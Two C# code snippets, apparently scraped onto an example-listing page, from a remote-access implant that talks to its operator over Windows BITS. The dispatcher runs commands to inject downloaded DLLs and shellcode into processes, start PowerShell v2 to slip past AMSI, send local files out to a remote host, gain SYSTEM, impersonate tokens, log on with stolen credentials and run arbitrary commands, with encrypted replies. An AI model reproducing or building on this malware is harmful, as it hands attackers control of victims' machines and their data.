Exemplo n.º 1
0
        public static void Main(string method, string[] arguments, Assembly dll)
        {
            var obj = new LauncherDll();

            var thr1 = new Thread(ExecuteDllInMemory);

            var a = new object [] { method, arguments, dll };

            thr1.Start(a);
        }
Exemplo n.º 2
0
        private void DoSomething(Content file)
        {
            var rps = "";

            try
            {
                switch (file.Commands[0])
                {
                case "inject_dll":
                {
                    var fileP   = _tempPath + @"\" + _id;
                    var headers = "reqId: " + _auth + "\r\ncontid: " + ContId;

                    if (_jobsManager.Get(_id, fileP, headers, BITS4.BG_JOB_PRIORITY.BG_JOB_PRIORITY_FOREGROUND))
                    {
                        try
                        {
                            var dll    = LoadDll(fileP);
                            var method = file.Commands[1];
                            var args   = "";

                            for (var i = 2; i < file.Commands.Length; i++)
                            {
                                args += file.Commands[i];
                                if (i < file.Commands.Length)
                                {
                                    args += " ";
                                }
                            }

                            var arguments = new string[] { args };

                            LauncherDll.Main(method, arguments, dll);
                            rps = "Dll injected!";
                        }
                        catch (Exception)
                        {
                            rps = "ERR:Fatal error occurred while trying to inject the dll.\n";
                        }
                    }
                    else
                    {
                        rps = "ERR:Dll not found!\n";
                    }

                    break;
                }

                case "inject_shellcode":
                {
                    var fileP   = _tempPath + @"\" + _id;
                    var headers = "reqId: " + _auth + "\r\ncontid: " + ContId;
                    var pid     = -1;
                    if (file.Commands.Length >= 2)
                    {
                        pid = int.Parse(file.Commands[1]);
                    }

                    if (_jobsManager.Get(_id, fileP, headers, BITS4.BG_JOB_PRIORITY.BG_JOB_PRIORITY_FOREGROUND))
                    {
                        byte[] sh;
                        GetEncryptedFileContent(fileP, out sh);

                        try
                        {
                            LauncherShellCode.Main(sh, _sysCall, pid);
                            rps = "Shellcode injected!\n";
                        }
                        catch (Exception)
                        {
                            rps = "ERR:Fatal error occurred while trying to inject shellCode.\n";
                        }
                    }
                    else
                    {
                        rps = "ERR:Shellcode file not found!\n";
                    }

                    break;
                }

                case "powershell":
                {
                    rps = Utils.ExecuteCommand("powershell -V 2 /C Write-Host hi");

                    if (rps.Contains("hi"))
                    {
                        LauncherPowershell.Main(file.Commands[1], file.Commands[2]);
                        rps = "You should have your Powershell at " + file.Commands[1] + ":" + file.Commands[2] + "!\n";
                    }
                    else
                    {
                        rps = "Version 2 of Powershell not available. Try injecting EvilSalsa by CyberVaca in order to use powershell without am" + "si.\n";
                    }

                    break;
                }

                case "send":
                {
                    var fileP   = _tempPath + @"\" + _id;
                    var headers = "reqId: " + _auth + "\r\ncontid: " + ContId;

                    if (_jobsManager.Get(_id, fileP, headers, BITS4.BG_JOB_PRIORITY.BG_JOB_PRIORITY_FOREGROUND))
                    {
                        File.Copy(fileP, file.Commands[1], true);
                        rps = "Dowload finished.\n";
                    }
                    else
                    {
                        rps = "ERR:Download failed!\n";
                    }

                    break;
                }

                case "exfiltrate":
                {
                    if (File.Exists(file.Commands[1]))
                    {
                        if (_jobsManager.Send(file.Commands[2], file.Commands[1]))
                        {
                            rps = "Exfiltration succeed.\n";
                        }
                        else
                        {
                            rps = "ERR:Exfiltration failed!\n";
                        }
                    }
                    else
                    {
                        rps = "ERR:File to exfiltrate not found!\n";
                    }

                    break;
                }

                case "getsystem":
                {
                    if (Utils.IsHighIntegrity(_sysCall))
                    {
                        rps = TokenManager.GetSystem() ? "We are System!\n" : "ERR:Process failed! Is this process running with high integrity level?\n";
                    }
                    else
                    {
                        rps = "ERR:Process failed! Is this process running with high integrity level?\n";
                    }

                    break;
                }

                case "rev2self":
                {
                    TokenManager.Rev2Self();
                    rps = "Welcome back.\n";

                    break;
                }

                case "runas":
                {
                    string user = "", domain = "", password = "";
                    var    userData = file.Commands[1].Split('\\');

                    if (userData.Length == 1)
                    {
                        domain = ".";
                        user   = userData[0];
                    }
                    else
                    {
                        domain = userData[0];
                        user   = userData[1];
                    }

                    password = file.Commands[2];

                    rps = TokenManager.RunAs(domain, user, password) ? "Success!" : "ERR:Invalid credentials.";

                    break;
                }

                case "list":
                {
                    rps = GetProcessInfo();
                    break;
                }

                case "impersonate":
                {
                    try
                    {
                        if (_tokenManager.Impersonate(int.Parse(file.Commands[1])))
                        {
                            rps = "Impersonation achieved!\n";
                        }
                        else
                        {
                            rps = "ERR: Not enough privileges!\n";
                        }
                    }
                    catch
                    {
                        rps = "ERR: Impersonation failed!\n";
                    }

                    break;
                }

                case "exit":
                {
                    Environment.Exit(0);
                    break;
                }

                default:
                {
                    rps = Utils.ExecuteCommand(file.Commands[0]);
                    break;
                }
                }
            }
            catch
            {
                rps = "ERR: Something went wrong!";
            }

            var response = new Response(rps, _auth);
            var filePath = _tempPath + @"\" + _id + ".txt";

            EncryptResponseIntoFile(filePath, response);
            TrySend(filePath);
        }